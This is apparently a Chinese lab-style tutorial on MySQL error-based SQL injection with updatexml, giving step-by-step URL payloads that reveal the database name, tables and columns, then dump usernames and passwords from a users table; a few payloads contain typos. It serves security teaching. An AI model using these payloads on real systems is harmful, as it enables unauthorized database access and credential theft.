SQL报错注入之updatexml

目录

1.updatexml报错原理

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

3.updatexml报错注入

3.1爆库名

3.2爆表名

3.3爆字段名

3.4爆数据


1.updatexml报错原理

updatexml(xml_doument,XPath_string,new_value)

第一个参数:XML的内容

第二个参数:是需要update的位置XPATH路径

第三个参数:是更新后的内容

所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。

2.判断是否有注入点

我们在地址栏中输入?id=1'

我们在地址栏中输入?id=1'--+

根据结果可以判断出存在数字型注入,并且页面会打印出报错信息,所以我们可以利用报错注入来解决

3.updatexml报错注入

3.1爆库名

复制代码
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符号,所以数据库名为security

3.2爆表名

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

3.3爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

++根据结果可以判断出字段名不全,这是因为updataxml函数只显示32位,所以我们可以用substr函数来慢慢截取来获得所有的字段名++

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

这样我们最终会得到所有的字段名

如果我们给select语句多加一个where条件会变成什么样呢?

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查询直接就爆出users表的列名,可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

3.4爆数据

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通过limit函数可以爆出各个用户的密码

当然也可以通过刚刚所述的substr函数来截取密码

XML 复制代码
?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml报错注入就结束啦!

相关推荐
瀚高PG实验室17 分钟前
数据库未正常关闭后,再次启动时只有主进程,数据库日志无输出
数据库
PXM的算法星球1 小时前
【Java后端】MyBatis 与 MyBatis-Plus 如何防止 SQL 注入?从原理到实战
java·sql·mybatis
LG.YDX1 小时前
MySQL:13.用户管理
数据库·mysql
晓柏2 小时前
常用数据库备份与恢复
数据库
caihuayuan42 小时前
【docker&redis】用docker容器运行单机redis
java·大数据·sql·spring·课程设计
二胖_备份管理员2 小时前
ORACLE数据库备份入门:第四部分:2-备份场景举例
数据库·oracle·备份·备份场景
聪明的墨菲特i3 小时前
SQL进阶知识:六、动态SQL
数据库·sql·sql注入·动态sql·prepare·execute
PingCAP3 小时前
APTSell x TiDB AutoFlow:AI 数字员工,助力销售业绩持续增长
数据库
PingCAP3 小时前
从企业数智化四阶段解读 TiDB 场景价值
数据库
Haoea!3 小时前
java-mybatis01
java·数据库·oracle